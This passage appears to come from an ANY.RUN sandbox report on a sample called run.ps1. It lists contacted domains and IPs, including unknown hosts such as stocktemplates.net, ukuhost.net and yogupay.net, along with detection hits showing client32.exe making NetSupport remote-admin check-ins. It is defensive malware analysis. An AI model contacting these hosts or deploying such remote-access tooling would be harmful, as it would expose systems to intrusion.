settings-win.data.microsoft.com
  • 4.231.128.59
whitelisted
www.bing.com
  • 88.221.92.173
  • 88.221.92.175
  • 88.221.92.168
  • 88.221.92.167
  • 88.221.92.176
  • 88.221.92.170
  • 88.221.92.169
  • 88.221.92.172
  • 88.221.92.166
whitelisted
google.com
  • 216.58.212.174
whitelisted
crl.microsoft.com
  • 2.18.79.132
  • 2.18.79.141
whitelisted
www.microsoft.com
  • 104.121.145.122
whitelisted
stocktemplates.net
  • 192.236.177.39
unknown
ukuhost.net
  • 79.132.128.77
unknown
geo.netsupportsoftware.com
  • 104.26.1.231
  • 104.26.0.231
  • 172.67.68.212
unknown
yogupay.net
unknown
self.events.data.microsoft.com
  • 13.69.116.107
whitelisted

Threats

PID
Process
Class
Message
3552
client32.exe
Potentially Bad Traffic
ET POLICY HTTP traffic on port 443 (POST)
3552
client32.exe
Potential Corporate Privacy Violation
ET POLICY NetSupport GeoLocation Lookup Request
3552
client32.exe
Misc activity
ET INFO NetSupport Remote Admin Checkin
3552
client32.exe
Potentially Bad Traffic
ET POLICY HTTP traffic on port 443 (POST)
3552
client32.exe
Misc activity
ET INFO NetSupport Remote Admin Checkin
2 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
run.ps1